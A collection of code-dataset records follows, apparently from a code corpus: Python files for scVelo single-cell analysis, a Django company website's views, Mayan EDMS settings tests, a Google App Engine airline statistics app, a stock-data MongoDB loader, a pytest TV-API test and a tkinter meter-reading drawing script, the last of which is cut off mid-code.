dim_reduce(adata, cell_line_name, n_comps = 100, n_pcs = 10, resolution = .5, tsne = False, umap = True, outdir = \"\", save = False):\n if len(list(adata.obs_names)) < n_comps:\n sc.tl.pca(adata, n_comps = len(list(adata.obs_names)))\n else:\n sc.tl.pca(adata, n_comps = n_comps)\n sc.pp.neighbors(adata, n_pcs=n_pcs)\n sc.tl.louvain(adata, resolution=resolution)\n # sc.pl.pca(adata, color = 'louvain')\n if tsne == True:\n print(\"Running tsne...\")\n sc.tl.tsne(adata, n_pcs=n_pcs)\n # sc.pl.tsne(adata, color='louvain')\n # if save == False:\n # plt.show()\n # else:\n # plt.savefig(op.join(outdir, f\"{cell_line_name}_tsne.pdf\"))\n if umap == True:\n print(\"Running UMAP...\")\n sc.tl.umap(adata)\n sc.pl.umap(adata, color = 'louvain', save = f\"{cell_line_name}.pdf\")\n return adata\n\ndef calc_velocity(adata, n_pcs = 30, n_neighbors = 30, calc_embedding = True):\n print(\"Calculating velocity...\")\n scv.pp.moments(adata, n_pcs=n_pcs, n_neighbors=n_neighbors)\n scv.tl.velocity(adata)\n scv.tl.velocity_graph(adata)\n if calc_embedding == True:\n scv.tl.velocity_embedding(adata, basis='pca')\n return adata\n\ndef plot_velocity(adata,cell_line_name, n_pcs = 30, n_neighbors = 30, plot_type = ['embedded'], basis = 'tsne', save = False, outdir = \"\"):\n\n for i in plot_type:\n if save == True:\n if i == 'stream':\n scv.pl.velocity_embedding_stream(adata, basis = basis,legend_loc='right margin', dpi = 200, color = 'louvain')\n if save == False:\n plt.show()\n else:\n plt.savefig(op.join(outdir, f\"{cell_line_name}_stream.pdf\"))\n elif i == 'grid':\n scv.pl.velocity_embedding_grid(adata, basis=basis, legend_loc='right margin', dpi = 200, color = 'louvain')\n if save == False:\n plt.show()\n else:\n plt.savefig(op.join(outdir, f\"{cell_line_name}_grid.pdf\"))\n elif i == 'embedded':\n\n scv.pl.velocity_embedding(adata, basis = basis, legend_loc='right margin', dpi = 200, color = 'louvain')\n if save == False:\n plt.show()\n else:\n plt.savefig(op.join(outdir, f\"{cell_line_name}_embedded.pdf\"))\n elif i == 'graph':\n\n\n scv.pl.velocity_graph(adata, basis = basis, legend_loc= ' 
right margin', dpi= 200, color = 'louvain')\n if save == False:\n plt.show()\n else:\n plt.savefig(op.join(outdir, f\"{cell_line_name}_graph.pdf\"))\n else:\n if i == 'stream':\n scv.pl.velocity_embedding_stream(adata, basis = basis,legend_loc='right margin', dpi = 200, color = 'louvain')\n plt.show()\n elif i == 'grid':\n scv.pl.velocity_embedding_grid(adata, basis=basis, legend_loc='right margin', dpi = 200, color = 'louvain')\n elif i == 'embedded':\n scv.pl.velocity_embedding(adata, basis = basis, legend_loc='right margin', dpi = 200, color = 'louvain')\n elif i == 'graph':\n scv.pl.velocity_graph(adata, basis = basis, legend_loc= ' right margin', dpi= 200, color = 'louvain')\n return adata\n\ndef plot_genes(adata, genes, cline = None, save = False, plot = 'umap', outdir = None):\n genes_keep = []\n for i in genes:\n if i in adata.var_names.values:\n genes_keep.append(i)\n if plot == 'pca':\n plt.figure()\n sc.pl.pca(adata, color=genes_keep, cmap='jet', save = f'{cline}.pdf')\n elif plot == 'umap':\n plt.figure()\n sc.pl.umap(adata, color = genes_keep, cmap = 'jet',save = f'{cline}.pdf')\n","sub_path":"velocity_tools/scVelo_tools/scvelo_utils.py","file_name":"scvelo_utils.py","file_ext":"py","file_size_in_byte":7421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"22819292","text":"# -*- coding: utf8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom back.models import *\nfrom django.template import Template, Context\nfrom django.template.loader import get_template\nimport json\n# Create your views here.\ndef index(requrst):\n newsobjls = News.objects.all()\n news1 = {}\n news2 = {}\n if len(newsobjls) == 0:\n pass\n elif len(newsobjls) == 1:\n picpath = ''\n try:\n newspicobj = NewsPic.objects.filter(News = newsobjls[0])[0]\n picpath = newspicobj.Picture.url\n except IndexError:\n pass\n title = newsobjls[0].Title\n shortcontent = newsobjls[0].ShortContent\n url = '/news'\n news1 = dict(Url = url, Title = title, PicPath = picpath, ShortContent = shortcontent)\n else:\n picpath = ''\n try:\n newspicobj = NewsPic.objects.filter(News = newsobjls[0])[0]\n picpath = newspicobj.Picture.url\n except IndexError:\n pass\n title = newsobjls[0].Title\n shortcontent = newsobjls[0].ShortContent\n url = '/news'\n news1 = dict(Url = url, Title = title, PicPath = picpath, ShortContent = shortcontent)\n\n picpath1 = ''\n try:\n newspicobj1 = NewsPic.objects.filter(News = newsobjls[1])[0]\n picpath1 = newspicobj1.Picture.url\n except:\n pass\n title1 = newsobjls[1].Title\n shortcontent1 = newsobjls[1].ShortContent\n url1 = '/news'\n news2 = dict(Url = url1, Title = title1, PicPath = picpath1, ShortContent = shortcontent1)\n\n classoneobjls = ClassOne.objects.all().order_by('Sequence')\n if len(classoneobjls) == 0:\n return render_to_response('gree_index.html', {'news1':news1, 'news2':news2})\n elif len(classoneobjls) == 1:\n bestproductobjls = BestProduct.objects.all()\n productls = []\n for bestproductobj in bestproductobjls:\n productname = bestproductobj.ProductName\n productpicobjls = ProductPic.objects.filter(Product = bestproductobj.Product)\n path = ''\n try:\n picobj = productpicobjls[0]\n path = picobj.Picture.url\n except IndexError:\n pass\n productls.append(dict(Title = productname, PicPath = path, classone = bestproductobj.ClassOne.ClassName, classtwo = bestproductobj.ClassTwo.ClassName))\n return render_to_response('gree_index.html', {'classonestr': classoneobjls[0].ClassName, \n 
'oneclassone':classoneobjls[0], \n 'productls':productls, \n 'news1':news1, \n 'news2':news2})\n else:\n length = len(classoneobjls)\n classonestrls = []\n classonestr = ''\n if length > 4:\n i = 4\n while i > 0:\n classonestrls.append(classoneobjls[4-i].ClassName)\n i -= 1\n classonestr = ','.join(classonestrls)\n else:\n for classoneobj in classoneobjls:\n classonestrls.append(classoneobj.ClassName)\n classonestr = ','.join(classonestrls)\n\n if length > 5:\n classonels = classoneobjls[0:4]\n else:\n classonels = classoneobjls[0:length - 1]\n\n if length > 5:\n oneclassone = classoneobjls[4]\n else:\n oneclassone = classoneobjls[length - 1]\n\n productls = []\n bestproductobjls = BestProduct.objects.filter(ClassOne = classoneobjls[0])\n for bestproductobj in bestproductobjls:\n productpicobjls = ProductPic.objects.filter(Product = bestproductobj.Product)\n path = ''\n try:\n picobj = productpicobjls[0]\n path = picobj.Picture.url\n except IndexError:\n pass\n productls.append(dict(Title = bestproductobj.ProductName, PicPath = path, classone = bestproductobj.ClassOne.ClassName, classtwo = bestproductobj.ClassTwo.ClassName))\n\n return render_to_response('gree_index.html', {'classonestr': classonestr, \n 'classonels':classonels, \n 'oneclassone':oneclassone,\n 'productls':productls,\n 'news1':news1, \n 'news2':news2})\n\ndef product(requrst):\n classoneobjls = ClassOne.objects.all().order_by('Sequence')\n classls = []\n for classoneobj in classoneobjls:\n classtwols = []\n classtwoobjls = ClassTwo.objects.filter(PreClass = classoneobj).order_by('Sequence')\n for classtwoobj in classtwoobjls:\n classtwols.append(classtwoobj.ClassName)\n classls.append(dict(name = classoneobj.ClassName, classtwols = classtwols))\n\n '''productls = []\n classoneobj = ClassOne.objects.get(Sequence = 0)\n classtwoobj = ClassTwo.objects.get(PreClass = classoneobj, Sequence = 0)\n productobjls = Products.objects.filter(ClassOne = classoneobj, ClassTwo = classtwoobj).order_by('Sequence')\n for productobj in productobjls:\n productpicobj = ProductPic.objects.get(Product = productobj, Sequence = 0)\n path = '/getPic/' + productpicobj.ImageName\n productls.append(dict(classtwo = classtwoobj.ClassName, path = path, name = productobj.ProductName))'''\n\n bestls = []\n for classoneobj in classoneobjls:\n name = classoneobj.ClassName\n bestprols = []\n bestproductobjls = BestProduct.objects.filter(ClassOne = classoneobj)\n for bestproductobj in bestproductobjls:\n classtwo = bestproductobj.ClassTwo.ClassName\n pname = bestproductobj.ProductName\n productpicobjls = ProductPic.objects.filter(ClassOne = classoneobj, ClassTwo = bestproductobj.ClassTwo, Product = bestproductobj.Product).order_by('Sequence')\n path = ''\n try:\n pinobj = productpicobjls[0]\n path = pinobj.Picture.url\n except IndexError:\n pass\n bestprols.append(dict(classtwo=classtwo, name=pname, path=path))\n bestls.append(dict(name = name, bestprols= bestprols))\n return render_to_response('gree_products.html', {\"classls\":classls, 'bestls':bestls})\n\ndef getProducts(requrst):\n classone = requrst.POST.get('classone', '')\n classtwo = requrst.POST.get('classtwo', '')\n productname = requrst.POST.get('productname', '')\n\n if classone != '' and classtwo == '' and productname == '':\n products = []\n classoneobj = ClassOne.objects.get(ClassName = classone)\n classtwoobj = ClassTwo.objects.get(PreClass = classoneobj, Sequence = 0)\n productobjls = Products.objects.filter(ClassOne = classoneobj, ClassTwo = classtwoobj).order_by('Sequence')\n for productobj 
in productobjls:\n path = ''\n try:\n productpicobj = ProductPic.objects.get(Product = productobj, Sequence = 0)\n path = productpicobj.Picture.url\n except Exception:\n pass\n products.append(dict(picsrc = path, productname = productobj.ProductName))\n jsonObject = json.dumps({'products':products},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n elif classone != '' and classtwo != '' and productname == '':\n products = []\n classoneobj = ClassOne.objects.get(ClassName = classone)\n classtwoobj = ClassTwo.objects.get(PreClass = classoneobj, ClassName = classtwo)\n productobjls = Products.objects.filter(ClassOne = classoneobj, ClassTwo = classtwoobj).order_by('Sequence')\n for productobj in productobjls:\n path = ''\n try:\n productpicobj = ProductPic.objects.get(Product = productobj, Sequence = 0)\n path = productpicobj.Picture.url\n except Exception:\n pass\n products.append(dict(picsrc = path, productname = productobj.ProductName))\n jsonObject = json.dumps({'products':products},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n elif classone != '' and classtwo != '' and productname != '':\n classoneobj = ClassOne.objects.get(ClassName = classone)\n classtwoobj = ClassTwo.objects.get(PreClass = classoneobj, ClassName = classtwo)\n productobj = Products.objects.get(ClassOne = classoneobj, ClassTwo = classtwoobj, ProductName = productname)\n picsrc = []\n productpicobjls = ProductPic.objects.filter(Product = productobj).order_by('Sequence')\n for productpicobj in productpicobjls:\n path = productpicobj.Picture.url\n picsrc.append(path)\n jsonObject = json.dumps({'picsrc':picsrc, 'table':productobj.ProductInfo, 'content':productobj.ProductInfoContent},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n else:\n return HttpResponse('请求有错。请刷新页面。')\n\ndef news(requrst):\n newsobjls = News.objects.all()[0:10]\n newscount = len(News.objects.all())\n newsls = []\n for newsobj in newsobjls:\n date = str(newsobj.CreateDate)\n datels = date.split('-')\n D = datels[2]\n YM = datels[0] + ' ' + datels[1]\n newsls.append(dict(D = D, YM = YM, Title = newsobj.Title, ShortContent = newsobj.ShortContent))\n return render_to_response('gree_news.html', {'newscount':newscount, 'newsls':newsls})\n\ndef getNews(requrst):\n name = requrst.POST['title']\n newsobj = News.objects.get(Title = name)\n jsonObject = json.dumps({'content':newsobj.LongContent},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n\ndef moreNews(requrst):\n page = requrst.POST['page']\n i = int(page)\n newsobjls = News.objects.all()[10 * (i - 1 ) : 10 * i]\n newsls = []\n for newsobj in newsobjls:\n date = str(newsobj.CreateDate)\n datels = date.split('-')\n D = datels[2]\n YM = datels[0] + ' ' + datels[1]\n newsls.append(dict(D = D, YM = YM, Title = newsobj.Title, ShortContent = newsobj.ShortContent))\n t = get_template('more_news.html')\n c = Context({'newsls':newsls})\n html = t.render(c)\n jsonObject = json.dumps({'html':html},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n\ndef shop(requrst):\n shopobjls = Shop.objects.all().order_by('Sequence')\n shopls = []\n for shopobj in 
shopobjls:\n path = ''\n try:\n picobj = ShopFirstPic.objects.get(Shop = shopobj)\n path = picobj.Picture.url\n except ShopFirstPic.DoesNotExist:\n pass\n shopls.append(dict(Title = shopobj.Title, path = path))\n return render_to_response('gree_stores.html', {'shopls':shopls})\n\ndef getStore(requrst):\n name = requrst.POST['storename']\n shopobj = Shop.objects.get(Title = name)\n jsonObject = json.dumps({'content':shopobj.Content},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n\ndef case(requrst):\n caseobjls = Case.objects.all().order_by('Sequence')\n casels = []\n for caseobj in caseobjls:\n path = ''\n try:\n picobj = CaseFirstPic.objects.get(Case = caseobj)\n path = picobj.url\n except CaseFirstPic.DoesNotExist:\n pass\n casels.append(dict(Title = caseobj.Title, path = path))\n return render_to_response('gree_engineering.html', {'casels':casels})\n\ndef getEngineer(requrst):\n name = requrst.POST['engineername']\n caseobj = Case.objects.get(Title = name)\n jsonObject = json.dumps({'content':caseobj.Content},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n\ndef job(requrst):\n jobobjls = Job.objects.all()\n return render_to_response('gree_recruitment.html', {'jobls':jobobjls})\n\ndef culture(requrst):\n honorpicobjls = HonorPic.objects.all()\n picpathls = []\n for honorpicobj in honorpicobjls:\n picpathls.append(honorpicobj.Picture.url)\n return render_to_response('gree_culture.html', {'companyinfo':Culture.objects.get(Part = 'companyinfo').Content,\n 'greemind':Culture.objects.get(Part = 'greemind').Content,\n 'leaderword':Culture.objects.get(Part = 'leaderword').Content,\n 'picpathls':picpathls})\n\ndef contact(requrst):\n contactusobj = ContactUs.objects.all()[0]\n return render_to_response('gree_contact.html', {'content':contactusobj.Content})\n\n\n\n\n","sub_path":"gree/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"541002181","text":"from __future__ import unicode_literals\n\nimport importlib\nimport logging\n\nfrom mayan.apps.common.tests.base import BaseTestCase\nfrom mayan.apps.documents import storages\nfrom mayan.apps.documents.settings import (\n setting_documentimagecache_storage_arguments,\n setting_storage_backend_arguments\n)\nfrom mayan.apps.smart_settings.tests.mixins import SmartSettingTestMixin\n\nfrom ..settings import setting_language_codes\n\n\nclass DocumentSettingsTestCase(SmartSettingTestMixin, BaseTestCase):\n def test_documents_language_codes_setting_double_quotes(self):\n self._set_environment_variable(\n name='MAYAN_{}'.format(setting_language_codes.global_name),\n value='[\"spa\",\"fra\"]'\n )\n\n self.assertEqual(\n setting_language_codes.value,\n ['spa', 'fra']\n )\n\n def test_documents_language_codes_setting_single_quotes(self):\n self._set_environment_variable(\n name='MAYAN_{}'.format(setting_language_codes.global_name),\n value=\"['spa','deu']\"\n )\n\n self.assertEqual(\n setting_language_codes.value,\n ['spa', 'deu']\n )\n\n\nclass DocumentStorageSettingsTestCase(SmartSettingTestMixin, BaseTestCase):\n def test_setting_documentimagecache_storage_arguments_invalid_value(self):\n self._set_environment_variable(\n name='MAYAN_{}'.format(\n setting_documentimagecache_storage_arguments.global_name\n ), value=\"invalid_value\"\n )\n 
self.test_case_silenced_logger_new_level = logging.FATAL + 10\n\n self._silence_logger(name='mayan.apps.documents.storages')\n\n with self.assertRaises(TypeError) as assertion:\n importlib.reload(storages)\n\n self.assertTrue('Unable to initialize' in str(assertion.exception))\n\n def test_setting_storage_backend_arguments_invalid_value(self):\n self._set_environment_variable(\n name='MAYAN_{}'.format(\n setting_storage_backend_arguments.global_name\n ), value=\"invalid_value\"\n )\n self.test_case_silenced_logger_new_level = logging.FATAL + 10\n\n self._silence_logger(name='mayan.apps.documents.storages')\n\n with self.assertRaises(TypeError) as assertion:\n importlib.reload(storages)\n\n self.assertTrue('Unable to initialize' in str(assertion.exception))\n","sub_path":"mayan/apps/documents/tests/test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"129208689","text":"#!/usr/bin/env python\n#\n# AHOSCH\n# UW PYTHON COURSE WEEK 10\n# Database List\n# Can be found at http://ahosch-ontime.appspot.com/\n\"\"\"attempts to create, query, and update a google database\"\"\"\n\n\nfrom google.appengine.ext import db\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import util\n\nclass Airline(db.Model):\n airlineName = db.StringProperty(required=True)\n airlineCode = db.StringProperty(required=True)\n\n\nclass OntimeStats(db.Model):\n airlineCode = db.StringProperty(required=True)\n departureCity = db.StringProperty(required=True)\n arrivalCity = db.StringProperty(required=True)\n totalFlights = db.IntegerProperty(default=0)\n cancelledFlights = db.IntegerProperty(default=0)\n divertedFlights = db.IntegerProperty(default=0)\n delayLength = db.ListProperty(int)\n\n def addFlight(self,flightCount=1,delay=0,cancelled=0,diverted=0):\n self.totalFlights = self.totalFlights + flightCount\n self.cancelledFlights = self.cancelledFlights + cancelled\n self.divertedFlights = self.divertedFlights + diverted\n self.delayLength.append(delay)\n self.put()\n\n def delayAverage(self):\n return int(sum(self.delayLength)/len(self.delayLength))\n\n def delayMax(self):\n return max(self.delayLength)\n\n def ontime(self):\n ontime = 0\n for flight in self.delayLength:\n if flight <= 5:\n ontime += 1\n return int('%.0f' % (float(ontime/float(self.totalFlights))*100))\n\n\nclass MainHandler(webapp.RequestHandler):\n def get(self):\n\n ####\"\"\" data generation hardcoded start\"\"\"\n s = Airline(airlineName='Singapore Airlines',airlineCode='SQ')\n s.put()\n ####\"\"\" data generation hardcoded end\"\"\"\n \n q=db.GqlQuery('SELECT * from Airline')\n results = q.fetch(1)\n for p in results:\n self.response.out.write('
'+p.airlineName+'\n')\n            self.response.out.write(p.airlineName+'\n')\n        self.response.out.write('')\n\nclass ontimeHandler(webapp.RequestHandler):\n    def get(self,airlineCode):\n\n        ####\"\"\" data generation hardcoded start\"\"\"\n        y = OntimeStats(airlineCode ='SQ',\n                        departureCity ='here',\n                        arrivalCity ='there',\n                        totalFlights =1)\n        db.run_in_transaction(y.addFlight)\n        y.put()\n        ####\"\"\" data generation hardcoded end\"\"\"\n\n        p = OntimeStats.all()\n\n        results = p.fetch(100)\n        for x in results:\n            self.response.out.write('FROM: '+x.departureCity+' TO: '+x.arrivalCity+'\n')\n            self.response.out.write('ON TIME PERCENT: '+str(x.ontime())+'\n')\n            self.response.out.write('TOTAL FLIGHTS: '+str(x.totalFlights)+'\n')\n            self.response.out.write('DELAY AVERAGE: '+str(x.delayAverage())+'\n')\n            self.response.out.write('MAX DELAY: '+str(x.delayMax())+'\n')\n        \n        self.response.out.write('')\n\n\ndef main():\n    application = webapp.WSGIApplication([('/', MainHandler),\n                                          (r'/airline/(.*)', ontimeHandler),\n                                          ],\n                                         debug=True)\n    util.run_wsgi_app(application)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"week9_assignment/ontime/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"343651616","text":"# coding:utf-8\n\nimport json\nimport os\n\nfrom pytdx.reader import TdxMinBarReader\n\nfrom SuperQuant.SQUtil import (SQ_util_date_stamp, SQ_util_log_info,\n                               SQ_util_time_stamp)\nfrom SuperQuant.SQSetting.SQSetting import DATABASE\n\n\ndef SQ_save_tdx_to_mongo(file_dir, client=DATABASE):\n    \"\"\"save file\n\n    Arguments:\n        file_dir {str:direction} -- path of the files\n\n    Keyword Arguments:\n        client {Mongodb:Connection} -- Mongo Connection (default: {DATABASE})\n    \"\"\"\n\n    reader = TdxMinBarReader()\n    __coll = client.stock_min_five\n    for a, v, files in os.walk(file_dir):\n\n        for file in files:\n\n            if (str(file)[0:2] == 'sh' and int(str(file)[2]) == 6) or \\\n                    (str(file)[0:2] == 'sz' and int(str(file)[2]) == 0) or \\\n                    (str(file)[0:2] == 'sz' and int(str(file)[2]) == 3):\n                SQ_util_log_info('Now_saving ' + str(file)\n                                 [2:8] + '\\'s 5 min tick')\n                fname = file_dir + os.sep + file\n                df = reader.get_df(fname)\n                df['code'] = str(file)[2:8]\n                df['market'] = str(file)[0:2]\n                df['datetime'] = [str(x) for x in list(df.index)]\n                df['date'] = [str(x)[0:10] for x in list(df.index)]\n                df['time_stamp'] = df['datetime'].apply(\n                    lambda x: SQ_util_time_stamp(x))\n                df['date_stamp'] = df['date'].apply(\n                    lambda x: SQ_util_date_stamp(x))\n                data_json = json.loads(df.to_json(orient='records'))\n                __coll.insert_many(data_json)\n\n\nif __name__ == '__main__':\n    file_dir = ['C:\\\\users\\\\yutiansut\\\\desktop\\\\sh5fz',\n                'C:\\\\users\\\\yutiansut\\\\desktop\\\\sz5fz']\n    for item in file_dir:\n        SQ_save_tdx_to_mongo(item)\n\n","sub_path":"SuperQuant_FrameWork/SuperQuant留存本/SQSU/deleted/save_tdx_file.py","file_name":"save_tdx_file.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"519411644","text":"\n\nfrom xai.brain.wordbase.adverbs._up import _UP\n\n#class header\nclass _UPPING(_UP, ):\n\tdef __init__(self,): \n\t\t_UP.__init__(self)\n\t\tself.name = \"UPPING\"\n\t\tself.specie = 'adverbs'\n\t\tself.basic = \"up\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adverbs/_upping.py","file_name":"_upping.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"92118547","text":"from lxml import etree\nfrom prettytable import PrettyTable\n\ntree = etree.parse(\"formal-tst.NE.key.04oct95_sample.txt.se.xml\")\ntotal_length = 0\ndictio = {}\nalready = {}\nverify = 0.0\n\nfor entity in tree.xpath(\"/specific_entities/specific_entity\"):\n\ttotal_length += 1\n\n\nt = PrettyTable(['Named entity', 'Type', 'Number of occurrences', 'Proportion in the text'])\n\n#Fill a first dictionary to get the number of occurrences of each word.\nfor entity in tree.xpath(\"/specific_entities/specific_entity\"):\n\tif entity[0].text not in dictio:\n\t\tdictio[entity[0].text] = 1\n\t\t\n\telse:\n\t\tdictio[entity[0].text] += 1\n\n#the second dictionary is used to avoid displaying the same entity twice\nfor entity in 
tree.xpath(\"/specific_entities/specific_entity\"):\n\tif entity[0].text not in already:\n\t\talready[entity[0].text] = 1\n\t\tt.add_row([entity[0].text, entity[3].text, dictio[entity[0].text], ((dictio[entity[0].text]/total_length)*100)])\n\t\t\n\nprint(t)","sub_path":"src/ii_iii/ii_2_script_extraction.py","file_name":"ii_2_script_extraction.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"157427109","text":"import datetime\nfrom collections import namedtuple\nfrom time import sleep\n\n#テスト結果\nTestReport = namedtuple(\"TestReport\", \n ( \"episode\", \n \"steps\",\n \"median_total_reward\",\n \"worst_total_reward\",\n \"training_TD_error\", \n \"test_TD_error\" )\n )\n\n\n#テスト結果のログを画面に出力する\nclass DisplayTestLog:\n def __int__(self):\n pass\n #def\n\n def print(self, data):\n print( \"episode:\" +str(data.episode)\n +\", steps:\" +str(data.steps)\n +\", median_toal_reward:{:.2f}\".format(data.median_total_reward)\n +\", worst_toal_reward:{:.2f}\".format(data.worst_total_reward)\n )\n #def\n#class\n\n\n#テスト結果のログをファイルに残す\nclass FileTestLog:\n def __init__(self, filename):\n self._retry = 0.1\n self._filename = filename\n\n with open(self._filename, \"a\") as file:\n file.write(\"#episode, steps, median_total_rewad, worst_total_rewad, training squared_TD_error, test squared_TD_error \\n\")\n #with\n #def\n\n def print(self, data):\n while True:\n #ファイルのアクセス権が取れるまでリトライ\n try:\n with open(self._filename, \"a\") as file:\n data_list = list(map(lambda value: str(value) , data))\n time_stamp = datetime.datetime.now()\n\n file.write(','.join(data_list)+\",\" +str(time_stamp) +\"\\n\")\n #with\n #書き込みに成功したら抜ける\n break\n\n except Exception:\n #アクセス権が取れなかったらリトライ\n sleep(self._retry)\n continue\n #try-except\n #while\n\n return\n #def\n#class\n\n\n#各種のテストログを残す\nclass TestLogs:\n def __init__(self, logs):\n self._logs = logs\n #def\n\n def print(self, data):\n for log in self._logs:\n log.print(data)\n #for\n return\n #def\n#class\n","sub_path":"dqn/test_log.py","file_name":"test_log.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"414065672","text":"#Author:Chris.chen\n# import queue\nimport multiprocessing\nimport threading\n\ndef f(qq):\n qq.put([42,None,'hello'])\n\nif __name__ == '__main__':\n # q = queue.Queue()\n # p = threading.Thread(target=f,)\n q = multiprocessing.Queue()\n p = multiprocessing.Process(target=f,args=(q,))\n p.start()\n print(q.get())\n","sub_path":"day10/进程queue.py","file_name":"进程queue.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"411872103","text":"import unittest\nimport vcr\n\nfrom pytest import fixture\nfrom trywrapper import TV\n\n\n@fixture\ndef tv_keys():\n \"\"\"Responsible only for returning the test data\"\"\"\n return [\n 'id', 'origin_country', 'poster_path', 'name', 'overview',\n 'popularity', 'backdrop_path', 'first_air_date', 'vote_count',\n 'vote_average'\n ]\n\n\n@vcr.use_cassette('tests/vcr_cassettes/tv-info.yml',\n filter_query_parameters=['api_key'])\ndef test_tv_info(tv_keys):\n \"\"\"tests an API to get a TV show's info\"\"\"\n\n tv_instance = TV(1396)\n response = tv_instance.info()\n\n assert isinstance(response, dict)\n assert response[\"id\"] == 1396\n assert 
set(tv_keys).issubset(response.keys())\n\n\n@vcr.use_cassette('tests/vcr_cassettes/tv-popular.yml',\n                  filter_query_parameters=['api_key'])\ndef test_tv_popularity(tv_keys):\n    \"\"\"Tests an API call to get popular tv shows\"\"\"\n\n    response = TV.popular()\n\n    assert isinstance(response, dict)\n    assert isinstance(response['results'], list)\n    assert set(tv_keys).issubset(response['results'][0].keys())\n","sub_path":"tests/test_trywrapper.py","file_name":"test_trywrapper.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"81640570","text":"import tkinter as tk\r\nimport math\r\n#from PIL import Image,ImageTK,ImageSequence\r\nmain_window=tk.Tk()\r\n#main_window.attributes(\"-alpha\",1.0)\r\ncanvas = tk.Canvas(main_window, bg='skyblue', width=800,height=200)\r\nOx=40\r\nOy=40\r\nrad=72\r\n\r\ndef circle_ptr():\r\n    for c in range(5):\r\n        p = c*rad*2\r\n        for i in range(10):\r\n            di=18\r\n            x=Ox+rad\r\n            y=Oy+rad\r\n            dotsize=2\r\n            radi=math.radians(0+di+(i*36))\r\n            rcos=rad*math.cos(radi)\r\n            rsin=rad*math.sin(radi)\r\n            cir_ptr= canvas.create_oval(p+x+rcos-dotsize,y+rsin-dotsize,p+x+rcos+dotsize,y+rsin+dotsize,fill='black')\r\n\r\n\r\ndef circle_num(font_type):\r\n    font_size ,num_position = int(rad/3.6) ,int(rad/4.8)\r\n    di,x,y = 270,Ox+rad,Oy+rad\r\n    for c in range(5):\r\n        p = c*rad*2\r\n        for i in range(10):\r\n            radi=math.radians(0+di+(i*36))\r\n            if c==1 or c==3:\r\n                radi=math.radians(0+di-(i*36))\r\n            rcos=(rad-num_position)*math.cos(radi)\r\n            rsin=(rad-num_position)*math.sin(radi)\r\n            cir_num= canvas.create_text(p+x+rcos,y+rsin,text=str(i),font=(font_type,font_size))\r\n\r\ndef circle_frame(x,y):\r\n    for i in range(5):\r\n        p= i*rad*2\r\n        cir1 = canvas.create_oval(x+p,y,x+p+rad*2,y+rad*2,fill='silver')\r\n        cir1 = canvas.create_oval(x+p+1,y+1,x+p+rad*2-1,y+rad*2-1,fill='silver')\r\n\r\n\r\ndef central_dot(Ox,Oy,color):\r\n    dot_size=int(rad/24)\r\n    cir_size = int(rad/4.8)\r\n    x=Ox+rad\r\n    y=Oy+rad\r\n    for i in range(5):\r\n        p = i*rad*2\r\n        cir = canvas.create_oval(x-cir_size+p,y-cir_size,x+cir_size+p,y+cir_size,fill='black')\r\n        cen = canvas.create_oval(x-dot_size+p,y-dot_size,x+dot_size+p,y+dot_size,fill=color)\r\n    #central_dot(Ox,Oy,\"white\")#for temp use\r\n    canvas.pack()\r\n\r\n\r\ndef initial():\r\n    main_window.title(\"台灣電力公司 TAI POWER\")\r\n    main_window.geometry('800x300')\r\n    label = tk.Label(main_window,text=\"抄 表 練 習 程 式 Beta3\",bg = 'yellow',font=('Arial Black',15)).place(x=0,y=0)\r\n    #label = canvas.create_text(180,20,text=\"抄 表 練 習 程 式 Beta3\",font=('Arial Black',20))\r\n    circle_frame(Ox,Oy)\r\n    central_dot(Ox,Oy,\"white\")\r\n    circle_ptr()\r\n    circle_num('Arial Black')\r\n    #circle_num('Bahnschrift SemiBold')\r\n    \r\n\r\n    \r\n\r\n\r\ninitial()\r\n\r\n\r\nangle=[20,40,60,80,100]\r\ndef pointer():\r\n    a=10\r\n    \r\ndi=0\r\ni=120\r\np=1*rad*2\r\nx=Ox+rad\r\ny=Oy+rad\r\np_size= int(rad/4.8) # pointer width size\r\npp_size = int(rad/36) # pointer tail width size\r\ndotsize=3 # temporary 